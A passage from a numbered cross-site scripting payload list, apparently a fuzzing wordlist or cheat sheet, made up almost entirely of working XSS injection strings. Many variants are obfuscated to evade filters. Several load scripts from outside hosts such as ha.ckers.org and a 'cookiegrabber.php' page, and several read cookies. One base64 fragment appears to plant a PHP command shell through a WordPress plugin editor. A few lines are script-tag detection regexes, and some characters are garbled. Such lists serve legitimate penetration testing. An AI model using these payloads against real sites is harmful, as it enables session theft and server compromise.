  5345. ></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  5346. // →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  5347. “></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  5348. </script><script>alert(XSS by Shawar)</script>
  5349. </script><script>alert(��Xss��)</script>
  5350. </script><script>alert(Xss)</script>
  5351. </script><script>alert(‘XSS’);</script>
  5352. </script><script>confirm(3)</script>
  5353. </SCRIPT>”>’><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>
  5354. </script><script>prompt(“test”)</script>
  5355. ;<><script></script>/<script>alert(‘0’)</script>
  5356. <</script/script><script>eval(‘\\u’+’0061'+’lert(1)’)//</script>
  5357. </script></script><<<<script><>>>><<<script>alert(123)</script>
  5358. </script></script><<<<script><>>>><<<script>alert(123)</script>
  5359. </script></script><<<<script><>>>><<<script>alert(XSS)</script>
  5360. <</script/script><script ~~~>\u0061lert(1)</script ~~~>
  5361. </script><script>/*var a=”/*””’/**/;confirm(1);//</script>
  5362. <script>self[‘alert’](2)</script>
  5363. <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
  5364. <script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>
  5365. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  5366. <script>setTimeout(‘alert(1)’,0)</script>
  5367. <script>setTimeout(“a” + “lert” + “(1)”);</script>
  5368. <script>setTimeout(“a” + “lert” + “(1)”);</script> // Using Basic Concatenation
  5369. <script>setTimeout(alert(88199),0)</script>
  5370. <script>setTimeout(/a/.source + /lert/.source + “(1)”);</script>
  5371. <script>setTimeout(/a/.source + /lert/.source + “(1)”);</script> // Using source property for concatenation
  5372. <script>setTimeout(location)</script>, use: <a href=”//target#&#8232;alert(1)”>CLICK</a>
  5373. <script> … setTimeout(\”writetitle()\”,$_GET[xss]) … </script>
  5374. (/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
  5375. <script/src=//?.?>
  5376. script/src=//??
  5377. <script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script>
  5378. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
  5379. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  5380. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  5381. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  5382. <script src=1 href=1 onerror=”javascript:alert(1)”></script>
  5383. <script src=’1.js’></script>
  5384. <script src=//3334957647/1>
  5385. <script src=”//aEa?L”></script>)
  5386. <script src=”#”>{alert(1)}</script>;1
  5387. <script src=//brutelogic.com.br/1>
  5388. <script src=//brutelogic.com.br/1.js>
  5389. <script src=//brutelogic.com.br/1.js>
  5390. <script src=”//brutelogic.com.br/1.js#
  5391. “><script src=//brutelogic.com.br/1.js#
  5392. <SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
  5393. <script src=”//brutelogic.com.br&sol;1.js&num;
  5394. <script src=”//brutelogic.com.br&sol;1.js&num;
  5395. “><script src=//brutelogic.com.br&sol;1.js&num;
  5396. “><script src=//brutelogic.com.br&sol;1.js&num;
  5397. <script src=/bypass/usercontent/xss.js></script>
  5398. <script src=>confirm(8)</script>
  5399. <script src=”data:%26comma;alert(1)//
  5400. <script src=data:%26comma;alert(1)//
  5401. “><script src=data:%26comma;alert(1)-”
  5402. “><script src=data:%26comma;alert(1)//
  5403. <script src=”data:%26comma;alert(1)%26sol;%26sol;
  5404. <script src=data:%26comma;alert(1)%26sol;%26sol;
  5405. <SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT>
  5406. <SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT> //Cross Browser (PEPE Vila)
  5407. <script/src=data:,alert()>
  5408. <script src=”data:,alert(1)//
  5409. <script src=data:,alert(1)>
  5410. “><script src=data:,alert(1)//
  5411. <script src=”data:,alert(1)%250A →
  5412. <script src=data:,alert(1)></script>
  5413. <script src=”data:,alert(64)%250A →
  5414. <script src=data:,alert(document.cookie)></script>
  5415. <script src=”data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==”></script>
  5416. <script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
  5417. <script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
  5418. “/><script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
  5419. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>
  5420. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
  5421. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  5422. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  5423. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
  5424. <script src=”data:&comma;alert(1)//
  5425. “><script src=data:&comma;alert(1)//
  5426. <script/src=”data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)
  5427. <script+src=data:,confirm(1)<! — 
  5428. “/><script+src=data:,confirm(1)<! — 
  5429. <script/src=”data:,eval(atob(location.hash.slice(1)))//#
  5430. <script/src=”data:,eval(atob(location.hash.slice(1)))//##eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3BsdWdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5waHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0nX3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRVRbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpDQp4LnNlbmQoJCk=
  5431. <script/src=data:&p=alert(50)></script>
  5432. <script src=data:text/html,alert(1)></script>
  5433. <script src=data:text/html;,alert(1)></script>
  5434. <script src=data:text/html,alert(document.cookie)></script>
  5435. <script src=data:text/html;,alert(document.cookie)></script>
  5436. <script src=”data:text/html;base64,YWxlcnQoMSk=”></script>
  5437. <script src=data:text/html;base64,YWxlcnQoMSk=></script>
  5438. <script src=”data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==”></script>
  5439. <script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
  5440. <script src=”data:text/javascript,alert(1)”></script>
  5441. <script src=data:text/javascript,alert(88199)></script>
  5442. <SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJ KTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT 0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS 0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CX U9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0E JCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0 JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV 0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0 UJKSAJKCAJKSAJICA7"></SCRIPT>
  5443. <SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJKTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0EJCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0UJKSAJKCAJKSAJICA7"></SCRIPT>
  5444. <script src=”data:text/javascript,confirm(1)”></script>
  5445. “/><script src=”data:text/javascript,confirm(1)”></script>
  5446. <script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
  5447. ><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
  5448. “<script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”
  5449. “\”><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”,
  5450. <script src=”data:text/plain\x2Cjavascript:alert(1)”></script>
  5451. <script/src=data:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(4)></script>
  5452. <script src=data:,\u006fnerror=\u0061lert(1)></script>
  5453. <script src=data:,\u006fnerror=\u0061lert;throw[document.domain]></script>
  5454. <script src=”data:\xCB\x8F,javascript:alert(1)”></script>
  5455. <script src=”data:\xD4\x8F,javascript:alert(1)”></script>
  5456. <script src=”data:\xE0\xA4\x98,javascript:alert(1)”></script>
  5457. <script src=//domain%26sol;my.js%26num;
  5458. <script src=”//domain%26sol;my.js%26num;
  5459. <script src=//DOMAIN/></script>
  5460. “><script src=”file:///c:/wonderful.js”></script><”
  5461. ‘> →<script/src=//go.bmoine.fr/xss>
  5462. <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>”
  5463. <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>
  5464. <;SCRIPT SRC=//ha.ckers.org/.j>;
  5465. <SCRIPT SRC=//ha.ckers.org/.j>
  5466. <script src=//HOST/SCRIPT></script>
  5467. <SCRIPT =”>” SRC=”http://3w.org/xss.js"></SCRIPT>
  5468. <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>;
  5469. <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
  5470. <;SCRIPT SRC=”;http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
  5471. <SCRIPT SRC=”http://ha.ckers.org/xss.jpg"></SCRIPT>
  5472. <;SCRIPT SRC=http://ha.ckers.org/xss.js
  5473. <SCRIPT SRC=http://ha.ckers.org/xss.js
  5474. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  5475. <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
  5476. <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
  5477. <SCRIPT =”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5478. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  5479. <SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5480. <SCRIPT+SRC=http://host/
  5481. <script src=”/?http://html5sec.org/test.js “></script>
  5482. <SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT>
  5483. <SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT> // Cross Browser
  5484. <script src=http://renwa.tk/d.js></script>
  5485. <script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
  5486. //|\\ <script //|\\ src=’https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  5487. <script src=https://www.google.com/complete/search?client=chrome
  5488. <script src=’https://www.n00py.io/evil.js'></script>
  5489. “<script src=’https://www.n00py.io/evil.js'></script>"
  5490. <script src=”http://www.evilsite.org/cookiegrabber.php"></script>
  5491. <script SRC=”http://www.securitycompass.com/xss.jpg"></script>
  5492. <script =”>” SRC=”http://www.securitycompass.com/xss.js"></script>
  5493. <script> src=”http://www.site.com/XSS.js"></script>
  5494. ‘>”><script src = ‘http://www.site.com/XSS.js'></script>
  5495. ‘>”><script src = ‘http://www.site.com/XSS.js'></script>
  5496. <SCRIPT SRC=”http://xss.cx/xss.jpg"></SCRIPT>
  5497. <SCRIPT SRC=http://xss.cx/xss.js?<B>
  5498. //|\\ <script //|\\ src=’http://xss.cx/xss.js'> //|\\ </script //|\\
  5499. <SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>
  5500. <SCRIPT =”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
  5501. <SCRIPT =”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
  5502. <SCRIPT src=”http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
  5503. <script src=http://xssor.io/xss.js></SCRIPT>
  5504. <SCRIPT SRC=http://xss.rocks/xss.js?< B >
  5505. <script src=http://yoursite.com/your_files.js></script>
  5506. <script src=”//INPUT”></script>
  5507. <script src=”INPUT”></script
  5508. <script src=”javascript:alert(1)”>
  5509. <script src=javascript:alert(1)>
  5510. <script src=javascript:alert(1)>
  5511. <script src=javascript:alert(160)>
  5512. <script src=”javascript:alert(3)”></script> // IE6, O11.01, OM10.1
  5513. <SCRIPT SRC=”%(jpg)s”></SCRIPT>
  5514. <script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
  5515. <script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(17)’)()}}
  5516. <SCRIPT SRC=%(jscript)s?<B>
  5517. <script src=”/\%(jscript)s”></script>
  5518. <script src=”\\%(jscript)s”></script>
  5519. <script src=%(jscript)s></script>
  5520. <SCRIPT/SRC=”%(jscript)s”></SCRIPT>
  5521. <script src=//l0.cm>//20
  5522. <SCRIPT SRC_NeatHtmlReplace=”//ha.ckers.org/.j”>
  5523. <SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.jpg"></SCRIPT>
  5524. <SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.js"></SCRIPT>
  5525. <script+src=”>”+src=”http://yoursite.com/xss.js?69,69"></script>
  5526. <script src=/upload/…></script>
  5527. <script src=”URL”></script>
  5528. <script src=URL></script>
  5529. <script/src=//xss.cx>/*
  5530. <script src=/xss.js></script><base href=//evil/
  5531. <script>’str1ng’.replace(/1/,alert)</script>
  5532. <script>str=’’;for(i=0;i<0xefff;i++){str+=’<script>AAAAAA’;};document.write(‘<svg>’+str+’</svg>’);</script>
  5533. <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
  5534. <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59)</script>
  5535. <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
  5536. </script><svg ‘//”
  5537. “></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
  5538. </script><svg onload=alert(1)>
  5539. </script><svg onload=alert(184)>
  5540. </script><svg onload=’-/”/-confirm(1)//’”
  5541. </script><svg onload=’-/”/-confirm(1)//’
  5542. →’”/></sCript><svG x=”>” onload=(co\u006efirm)``>
  5543. /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i,
  5544. /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i;
  5545. “/<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i”
  5546. ( /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i)
  5547. <script/&Tab; src=’https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  5548. <script>this[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
  5549. <script>this[490837..toString(1<<5)](/*code to eval()*/)</script>
  5550. <script>this[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
  5551. <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
  5552. <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
  5553. <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
  5554. <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
  5555. <script>this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
  5556. <script>throw~delete~typeof~prompt(1)</script>
  5557. <script>throw new class extends Function{}(‘alert(1)’)``</script>
  5558. →</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
  5559. →</script></title></style>”/</textarea><a’ onclick=alert()//>*/alert()/*
  5560. >]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img -
  5561. <script>top[‘alert’](3)</script>
  5562. <script>try{eval(“<></>”);logBoolean(1)}catch(e){logBoolean(0)};</script>
  5563. <script type=”text/javascript”></script>
  5564. <script type=text/javascript></script>
  5565. <script type=text/vbscript>msgbox document.location</script>
  5566. <script type=text/vbscript>msgbox document.location</script> // IE 10
  5567. <script type=”text/xaml”><Canvas Loaded=”confirm” /></script>
  5568. <script type=vbscript>MsgBox(0)</script>
  5569. <script>\u0061\u006C\u0065\u0072\u0074(123)</script>
  5570. <script>\u0061\u006C\u0065\u0072\u0074`1`</script>
  5571. <script>\u0061\u006C\u0065\u0072\u0074(1)</script>
  5572. <script>\u0061\u006C\u0065\u0072\u0074`1`</script> // ES6 Variation
  5573. <script>\u0061\u006C\u0065\u0072\u0074(1)</script> // Unicode escapes
  5574. <script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
  5575. <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script>
  5576. <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
  5577. <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U
  5578. <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
  5579. <script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script>
  5580. <script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script> // ES6 Variation
  5581. ?scriptualert(EXSSE)?/scriptu
  5582. <script> “\ud83d\u*hex4*”.match(/.*<.*/) ? log(*num*) : null; </script>
  5583. <script>-{valueOf:location,toString:[].pop,0:’vbscript:alert%281%29',length:1}</script>
  5584. <script>-{valueOf:location,toString:[].pop,0:’vbscript:confirm%281%29',length:1}</script>
  5585. <script>var%20c=1337";alert(c)</script>
  5586. <script>var%20x%20=%20a?aa?;%20confirm(1);//a?;</script>
  5587. <script>var a = “</script> <script> alert(‘XSS !’); </script> <script>”;</script>
  5588. <script>var fn=window[490837..toString(1<<5)];fn(atob(‘YWxlcnQoMSk=’));</script>
  5589. <script>var fn=window[490837..toString(1<<5)];fn(/*code to eval()/*);</script>
  5590. <script>var fn=window[atob(‘ZXZhbA==’)];fn(atob(‘YWxlcnQoMSk=’));</script>
  5591. <script>var fn=window[atob(‘ZXZhbA==’)];fn(/*code to eval()/*);</script>
  5592. <script>var fn=window[String.fromCharCode(101,118,97,108)];fn(atob(‘YWxlcnQoMSk=’));</script>
  5593. <script>var fn=window[String.fromCharCode(101,118,97,108)];fn(/*code to eval()/*);</script>
  5594. <script> vari=location.hash; document.write(i); </script>
  5595. <script>var junk = ‘</script><script>alert(1)</script>’;</script>
  5596. <script>var location={};</script>
  5597. <script>var m=<html><a href=”//host”>link</a>
  5598. <script>var m=<html><a href=//site>link</a>
  5599. <script>var m=<html><a href=//site>link</a></html></script> // XML inside JS
  5600. <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
  5601. <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
  5602. <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
  5603. <script>var name=”&quot;-alert``//”</script>
  5604. <script>var q=””;alert(1)//”</script>
  5605. <script>var q=””;location=’javascript\x3Aalert\x281\x29'//”</script>
  5606. <script>var q=””;location=’javascript\x3Aalert\x2822\x29'//”</script>
  5607. <script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
  5608. <script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>
  5609. <script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
  5610. <script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
  5611. <script>var var = 1; alert(var)</script>
  5612. <script>var var = 1; alert(var)</script>
  5613. <script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
  5614. <script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
  5615. <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
  5616. <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
  5617. <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script>
  5618. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
  5619. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
  5620. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>
  5621. “/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#
  5622. <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
  5623. <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#
  5624. <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
  5625. <script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>
  5626. <script> Var x=vInputv; </script>
  5627. <script/v>confirm(/@jackmasa/)</script>
  5628. <script>void(‘&b=’);alert(1);</script>
  5629. <script>window[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
  5630. <script>window[490837..toString(1<<5)](/*code to eval()*/)</script>
  5631. <script>window[‘alert’](0)</script>
  5632. <script>window[‘alert’](document[‘domain’])<script>
  5633. <script>window.alert(‘XSS Vulnerable’);</script>
  5634. /><script>window.alert(‘XSS Vulnerable’);</script>
  5635. <script>window[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
  5636. <script>window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
